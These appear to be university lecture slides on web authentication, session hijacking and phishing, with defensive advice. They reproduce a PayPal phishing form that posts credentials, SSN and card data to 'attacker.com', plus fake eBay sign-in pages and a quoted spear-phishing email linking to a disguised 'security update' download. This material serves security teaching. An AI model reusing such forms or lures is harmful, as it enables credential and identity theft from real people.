Authentication & Impersonation

CS 161: Computer Security
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Authentication

• Verifying someone really is who they say they claim they are
• Web server should authenticate client
• Client should authenticate web server
Impersonation

• Pretending to be someone else
• Attacker can try to:
  – Impersonate client
  – Impersonate server
Authenticating users

• How can a computer authenticate the user?
  – “Something you know”
    • e.g., password, PIN
  – “Something you have”
    • e.g., smartphone, ATM card, car key
  – “Something you are”
    • e.g., fingerprint, iris scan, facial recognition
Two-factor authentication

Authentication using two of:

– Something you know (account details or passwords)
– Something you have (tokens or mobile phones)
– Something you are (biometrics)
Example

Online banking:
– Hardware token or card (“smth you have”)
– Password (“smth you know”)

Mobile phone two-factor authentication:
- Password (“smth you know”)
- Code received via SMS (“smth you have”)

Another example

- Password
+ 
- Answer to security question

This is not two-factor authentication because both of the factors are something you know
After authenticating..

- Session established
  - Session ID stored in cookie
  - Web server maintains list of active sessions (sessionID mapped to user info)
- Reauthentication happens on every http request automatically
  - Every http request contains cookie
After authenticating...

**sessionID = 3458904043**

Must be unpredictable

**Active sessions:**
- 3458904043 | Alice
- 5465246234 | Bob

**Session hijacking attack:**
- Attacker steals sessionID, e.g., using a packet sniffer
- Impersonates user
After authenticating...

Alice

```
sessionID = 3458904043
Must be unpredictable
```

Active sessions:
3458904043 | Alice
5465246234 | Bob

Protect sessionID from packet sniffers:
• Send encrypted over HTTPS
• Use *secure* flag to ensure this

When should session/cookie expire?
• Often is more secure
• But less usable for user

Other flags?
• *httponly* to prevent scripts from getting to it
After authenticating...

Alice

sessionID = 3458904043
Must be unpredictable

Active sessions:
3458904043 | Alice
5465246234 | Bob

What if attacker obtains old sessionID somehow?

• When user logs out, server must remove Alice’s entry from active sessions
• Server must not reuse the same session ID in the future
• Old sessionID will not be useful
Authenticating the server

Why should user authenticate the web server she is interacting with?

• User is introducing sensitive data to server including credentials for performing actions
Phishing

- Attacker creates fake website that appears similar to a real one
- Tricks user to visit site (e.g. sending email)
- User inserts credentials and sensitive data which gets sent to attacker
- Web page then directs to real site or shows maintenance issues
<form action="http://attacker.com/paypal.php" method="post" name=Date>

Please fill in the correct information for the following category to verify your identity.

**Security Measures**

Email address: 
PayPal Password: 

| Full Name: | [ ] |
| SSN: | [ - - ] |
| Card Type: | [ ] |
| Card Number: | [ ] |
| Expiration Date: | [ Month / Year ] (mm/yyyy) |
| Card Verification Number (CVV2): | [ ] |
| Street: | [ ] |
| City: | [ ] |
| Country: | [ ] |
| Zip Code: | [ ] |
| Telephone: | [ ] |
| Verified By Visa / Mastercard Securecode: | [ ] |
| Date of Birth: | [ - - - ] (Ex: dd-mm-yyyy) |

[Submit Form]

**Protect Your Account Info**

Make sure you never provide your password to fraudulent persons.

PayPal automatically encrypts your confidential information using the Secure Sockets Layer protocol (SSL) with an encryption key length of 128-bits (the highest level commercially available).

For more information on protecting yourself from fraud, please review our Security Tips at http://www.paypal.com/securitytips

**Protect Your Password**

You should *never* give your PayPal password to anyone, including PayPal employees.

</form>
Welcome to eBay

Ready to bid and buy? Register here

Join the millions of people who are already a part of the eBay family. Don't worry, we have room for one more.

Register as an eBay Member and enjoy privileges including:

- Bid, buy and find bargains from all over the world
- Shop with confidence with PayPal Buyer Protection
- Connect with the eBay community and more!

Sign in to your account

Back for more fun? Sign in now to buy, bid and sell, or to manage your account.

User ID: ____________________________
I forgot my user ID

Password: __________________________
I forgot my password

Keep me signed in for today. Don't check this box if you're at a public or shared computer.

Sign in

Having problems with signing in? Get help.

Protect your account: Create a unique password by using a combination of letters and numbers that are not
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Sign in to your account

Back for more fun? Sign in now to buy, bid and sell, or to manage your account.

User ID: [bieber]
I forgot my user ID

Password: [**********]
I forgot my password

☐ Keep me signed in for today. Don’t check this box if you’re at a public or shared computer.

Having problems with signing in? Get help.

Protect your account: Create a unique password by using a combination of letters and numbers that are not
Please confirm your identity jbieber

Please answer security question below.

What is your mother’s maiden name?  
Smith

Answer the secret question you provided.

What is your other eBay user ID or another’s member in your household?
NA

What email used to be associated with this account?
bieberlicious@hotmail.com

Have you ever sold something on eBay?
No
Thanks jbieber. Your identity has been confirmed.

Now you can pick up where you left off.

Save Profile
This listing (350121605127) has been removed, or this item is not available.

- Please check that you've entered the correct item number
- Listings that have ended 90 or more days ago will not be available for viewing.
Phishing prevention

• User should check URL!

http://eBay.attacker.com/
Does not suffice to check what it says you click on

Now go to Google!

http://google.com

Because it can be:
<a src="http://attacker.com">http://google.com</a>

Check the address bar!
URL obfuscation attack

- Attacker can choose similarly looking URL with a typo
  
  bankofamerica.com
  
  bankofthevest.com
Homeograph attack

- Unicode characters from international alphabets may be used in URLs

  paypal.com (first p in Cyrillic)

- URL seems correct, but is not

Another example:
www.pnc.com/webapp/unsec/homepage.var.cn
Phishing prevention

- User should check URL!
  - Carefully!
“Spear Phishing”

From: Lab.senior.manager@gmail.com
Subject: FW: Agenda
Body: This below agenda just came in form from Susan, please look at it.
>From: Norris, Susan (ORO)
>To: Manager, Senior; Rabovsky, Joel MJ
>Subject: Agenda
>Thanks, nice to know that you all care this so much!
>
>Susan Norris
>norrissg@oro.doe.gov

Attached: Agenda Mar 4.pdf

Targeted phishing that includes details that seemingly must mean it’s legitimate
To: vern@ee.lbl.gov
Subject: RE: Russian spear phishing attack against .mil and .gov employees
From: jeffreyc@cia.gov
Date: Wed, 10 Feb 2010 19:51:47 +0100

Russian spear phishing attack against .mil and .gov employees

A "relatively large" number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or IntellLink concerning a report by the National Intelligence Council named the "2020 Project". It's purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft Windows and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/xwc1pi

Yep, this is itself a spear-phishing attack!

Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal Investigator of Project Grey Goose, and the author of "Inside Cyber Warfare".
jeffreyc@greylogic.us
Sophisticated phishing

• Context-aware phishing – 10% users fooled
  – Spoofed email includes info related to a recent eBay transaction/listing/purchase

• Social phishing – 70% users fooled
  – Send spoofed email appearing to be from one of the victim’s friends (inferred using social networks)

• West Point experiment
  – Cadets received a spoofed email near end of semester: "There was a problem with your last grade report; click here to resolve it.” 80% clicked.
Why does phishing work?

• User mental model vs. reality
  – Browser security model too hard to understand!

• The easy path is insecure; the secure path takes extra effort

• Risks are rare
Authenticating the server

- Users should:
  - Check the address bar carefully. Or, load the site via a bookmark or by typing into the address bar.
  - Guard against spam
  - Do not click on links, attachments from unknown
- Browsers also receive regular blacklists of phishing sites (but this is not immediate)
- Mail servers try to eliminate phishing email
Questions?